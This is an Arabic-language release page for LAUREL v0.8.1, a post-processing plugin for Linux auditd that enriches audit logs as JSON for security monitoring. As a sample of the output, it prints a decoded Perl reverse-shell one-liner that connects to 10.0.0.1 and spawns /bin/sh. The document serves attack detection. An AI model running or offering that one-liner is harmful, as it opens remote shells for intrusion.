العودة إلى التحديثات
New releaseJul 16, 2026

laurel v0.8.1

تحويل سجلات تدقيق Linux لاستخدام SIEM

مشاركة

شعار

Linux Audit – تسجيل سهل وقوي وقابل للاستخدام

حالة البناء

LAUREL هو مكون إضافي لمعالجة الأحداث بعد وقوعها لـ auditd(8) يقوم بتوليد سجلات تدقيق غنية ومفيدة بتنسيق JSON مناسبة لإعدادات مراقبة الأمان الحديثة.

يمكن العثور على الوثائق المقابلة لأحدث إصدار مستقر هنا.

لماذا؟

باختصار: بدلاً من أحداث التدقيق التي تبدو هكذا…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

……يقوم LAUREL بتحويلها إلى سجلات JSON حيث تصبح الفوضى التي يحاول المهاجمون/مختبرو الاختراق/فريق الأحمر إحداثها واضحة للوهلة الأولى:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

يحدث هذا في المصدر لأن LAUREL يعمل على المضيف حيث يتم توليد أحداث التدقيق. يتم إثراء الأحداث بمعلومات مفيدة حول العملية الأم (ppid):

"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

التوثيق

تم وصف تفاصيل التكوين والتشغيل في صفحة الدليل laurel(8). يمكن العثور على تفاصيل حول تنسيق السجل والمبررات في صفحة الدليل laurel-about(7). تحتوي صفحة laurel-audit-rules(7) على نصائح وأمثلة لتكوين قواعد التدقيق المفيدة لكشف تكتيكات المهاجمين.

تحتوي تعليمات تثبيت LAUREL على إرشادات حول كيفية بناء LAUREL من المصدر وكيفية تثبيته وتكوينه.

طورنا LAUREL لأننا لم نكن راضين عن مجموعات الميزات وخصائص الأداء للمشاريع والمنتجات الحالية. يُرجى الرجوع إلى مستند الأداء للحصول على التفاصيل.

انظر أيضًا

الترخيص

رخصة جنو العمومية العامة، الإصدار 3

المؤلفون

تم إنشاء الشعار بواسطة Birgit Meyer <[email protected]>.

الفئات